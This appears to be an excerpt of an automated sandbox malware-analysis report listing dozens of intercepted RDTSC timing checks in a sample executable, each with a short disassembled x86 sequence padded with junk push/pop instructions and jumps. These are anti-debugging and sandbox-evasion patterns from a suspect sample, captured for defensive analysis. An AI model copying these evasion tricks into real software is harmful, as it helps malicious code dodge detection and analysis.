Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5797D second address: F579DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, 68539FA7h 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F577C53EFC8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub dword ptr [ebp+12A0264Bh], edi 0x00000032 mov dword ptr [ebp+12A033B2h], ebx 0x00000038 nop 0x00000039 jmp 00007F577C53EFCEh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jnp 00007F577C53EFCCh 0x00000047 jno 00007F577C53EFC6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E61 second address: FA1E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F577C5415C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E6D second address: FA1E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E72 second address: FA1E86 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C5415CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1FCD second address: FA1FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007F577C53EFCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6B3F second address: FA6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CB3 second address: FA6CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CB8 second address: FA6CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CBE second address: FA6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6FC6 second address: FA6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6FCF second address: FA6FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA7101 second address: FA7109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA7109 second address: FA712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCCh 0x0000000c jmp 00007F577C53EFD1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA712D second address: FA7187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F577C5415CBh 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F577C5415D0h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C5415D9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA675 second address: FAA692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F577C53EFCFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA692 second address: FAA6AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA6AC second address: FAA6B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA9F9A second address: FA9FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F577C5415D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3B3 second address: FAA3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3B9 second address: FAA3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F577C5415CDh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3CB second address: FAA3E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3E2 second address: FAA3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3E6 second address: FAA3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB0FD5 second address: FB1011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F577C5415D5h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F577C5415C8h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jns 00007F577C5415D0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1011 second address: FB102B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F577C53EFC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB102B second address: FB102F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB12AF second address: FB12B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB12B3 second address: FB12D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F577C5415CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1557 second address: FB1581 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F577C53EFC6h 0x00000009 pop ecx 0x0000000a js 00007F577C53EFDAh 0x00000010 jmp 00007F577C53EFD2h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1581 second address: FB159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F577C5415D2h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB159C second address: FB15A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1BC9 second address: FB1BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1BCE second address: FB1C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C53EFCBh 0x00000008 jne 00007F577C53EFC6h 0x0000000e jmp 00007F577C53EFD2h 0x00000013 jmp 00007F577C53EFD9h 0x00000018 popad 0x00000019 jmp 00007F577C53EFD2h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1C27 second address: FB1C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1F42 second address: FB1F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2212 second address: FB2229 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F577C5415CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2229 second address: FB2249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCAh 0x00000009 popad 0x0000000a jmp 00007F577C53EFD1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB253D second address: FB2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F577C5415C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2AE5 second address: FB2AEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB5FF8 second address: FB600A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB628B second address: FB629D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F577C53EFC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB657C second address: FB6580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB6580 second address: FB6584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC206E second address: FC2072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2237 second address: FC224F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F577C53EFC6h 0x00000009 jmp 00007F577C53EFCDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC224F second address: FC2282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F577C5415CEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F577C5415CFh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F577C5415C6h 0x0000001b jno 00007F577C5415C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2547 second address: FC2550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2677 second address: FC268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F577C5415C6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC268A second address: FC268E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27E4 second address: FC27EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27EB second address: FC27F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27F4 second address: FC27FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3555 second address: FC3566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C53EFC6h 0x0000000a jns 00007F577C53EFC6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3566 second address: FC356B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3D00 second address: FC3D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCAh 0x00000009 popad 0x0000000a jo 00007F577C53EFEEh 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jo 00007F577C53EFC6h 0x00000019 jmp 00007F577C53EFCEh 0x0000001e jno 00007F577C53EFC6h 0x00000024 popad 0x00000025 pushad 0x00000026 push edx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC1C00 second address: FC1C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC889E second address: FC88B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pushad 0x00000008 jne 00007F577C53EFC6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF1FC second address: FCF208 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F577C5415C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF208 second address: FCF214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F577C53EFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF214 second address: FCF218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF218 second address: FCF238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jo 00007F577C53EFC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF238 second address: FCF23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEC17 second address: FCEC30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEC30 second address: FCEC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F577C5415D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF21 second address: FCEF31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF31 second address: FCEF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F577C5415CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF46 second address: FCEF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDC6AA second address: FDC6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFA6 second address: FDFFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFC5 second address: FDFFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFCA second address: FDFFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007F577C53EFC6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFDA second address: FE0004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F577C5415D1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F577C5415CCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE0004 second address: FE0019 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F577C53EFCFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE6FA0 second address: FE6FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C5415D5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FE6FBB second address: FE7007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jl 00007F577C53EFC6h 0x0000000b popad 0x0000000c jmp 00007F577C53EFD6h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F577C53EFD2h 0x0000001a jmp 00007F577C53EFD4h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA29F second address: FEA2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2A3 second address: FEA2A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2A7 second address: FEA2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F577C5415CEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2B7 second address: FEA2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2BD second address: FEA2DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F577C5415D9h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FEA2DD second address: FEA2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FF2F4E second address: FF2F5A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFB7D5 second address: FFB7E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F577C53EFC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA0E4 second address: FFA0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA4F3 second address: FFA52E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F577C53EFDCh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F577C53EFD1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA6B7 second address: FFA6D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F577C5415C6h 0x00000008 jmp 00007F577C5415D7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFA6D8 second address: FFA6EB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F577C53EFCEh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FFAB37 second address: FFAB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F577C5415C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017A7 second address: 10017AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 10017AC second address: 10017C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
